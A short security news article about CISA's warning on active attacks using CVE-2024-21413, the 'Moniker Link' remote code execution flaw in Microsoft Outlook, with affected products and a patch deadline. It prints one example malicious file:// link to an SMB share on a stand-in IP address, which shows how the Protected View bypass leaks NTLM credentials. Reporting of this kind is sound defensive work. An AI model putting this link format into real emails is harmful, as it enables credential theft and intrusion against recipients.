CISA warns of ongoing attacks exploiting Microsoft Outlook remote code execution (RCE) flaw
Take action: You need to update your Microsoft Outlook and MS Office. Right Now. Or be hacked. There is no debate about this, because hackers don't care that it's a hassle.
Learn More
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued a critical warning regarding ongoing attacks exploiting a remote code execution (RCE) vulnerability in Microsoft Outlook.
The vulnerability, is tracked as CVE-2024-21413 (CVSS score 9.8) and stems from improper input validation in Microsoft Outlook when handling emails containing malicious links. What makes this flaw particularly dangerous is its ability to bypass Microsoft's Protected View security feature, which typically protects users by opening potentially harmful files in read-only mode. The Preview Pane itself can serve as an attack vector, meaning users don't even need to open malicious documents to be affected.
The attack methodology, dubbed "Moniker Link," is remarkably straightforward. Attackers can bypass Outlook's built-in protections for malicious links by using the file:// protocol and adding an exclamation mark after the file extension, along with random text. For example, a malicious link might be structured as:
file:///\\10.10.111.111\test\test.rtf!something.
This simple modification allows attackers to potentially steal NTLM credentials and execute arbitrary code through specially crafted Office documents.
The vulnerability affects several Microsoft products, including:
- Microsoft Office LTSC 2021
- Microsoft 365 Apps for Enterprise
- Microsoft Outlook 2016
- Microsoft Office 2019
CISA has ordered federal agencies must secure their systems against this vulnerability by February 27, 2025. CISA strongly recommends that private organizations also prioritize patching this vulnerability to protect against ongoing attacks.
Update - as of 1st of December 2025, a PoC exploit for this vulnerability has been published.
